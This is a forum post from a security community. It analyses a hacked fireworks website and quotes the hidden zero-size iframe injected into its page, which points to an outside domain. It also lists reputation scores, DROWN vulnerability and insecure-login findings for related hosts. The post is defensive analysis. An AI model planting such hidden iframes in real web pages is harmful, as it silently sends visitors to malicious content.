Avast community forum
Home
Help
Search
Login
Register
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
Hacked and defaced website with hidden iFrame detected?
« previous
next »
Print
Pages: [
1
]
Go Down
Author
Topic: Hacked and defaced website with hidden iFrame detected? (Read 1172 times)
0 Members and 1 Guest are viewing this topic.
polonus
Avast Überevangelist
Probably Bot
Posts: 33900
malware fighter
Hacked and defaced website with hidden iFrame detected?
«
on:
April 10, 2016, 11:37:44 PM »
See:
http://killmalware.com/bigbombfireworks.com/#
iframes
Any iframes? Yes there are.
<iframe width="0" height="0" src="-http://evmjuarez.com/x7ZDuTA-53c&autoplay=1.htm" frameborder="0"></iframe> *
Re:
http://toolbar.netcraft.com/site_report?url=http://bigbombfireworks.com
Shun this site as it has very poor rating:
https://www.mywot.com/en/scorecard/p3nlhg328c1328.shr.prod.phx3.secureserver.net?utm_source=addon&utm_content=rw-viewsc
GoDaddy abuse:
http://toolbar.netcraft.com/site_report?url=http://p3nlhg328c1328.shr.prod.phx3.secureserver.net
and DROWn vulnerable:
https://test.drownattack.com/?site=http%3A%2F%2Fp3nlhg328c1328.shr.prod.phx3.secureserver.net%2F
On that iFrame destination * see:
https://seomon.com/domain/evmjuarez.com/
Overview
By default, excessive information about the server and frameworks used by a Apache application are returned in the response headers. These headers can be used to help identify security flaws which may exist as a result of the choice of technology exposed in these headers.
Result
The address you entered is unnecessarily exposing the following response headers which divulge its choice of web platform:
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Configuring the application to not return unnecessary headers keeps this information silent and makes it significantly more difficult to identify the underlying frameworks.
On the external link
http://toolbar.netcraft.com/site_report?url=http://up.harajgulf.com
we find insecure log-in
http://up.harajgulf.com/do.php?img=
(on txt log-in)
Alerts (1)
Insecure login (1)
Password will be transmited in clear to -http://up.harajgulf.com/ucp.php?go=login
Infos (1)
Encryption (HTTPS) (1)
Communication is NOT encrypted
polonus
«
Last Edit: April 10, 2016, 11:45:33 PM by polonus
»
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
Print
Pages: [
1
]
Go Up
« previous
next »
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
Hacked and defaced website with hidden iFrame detected?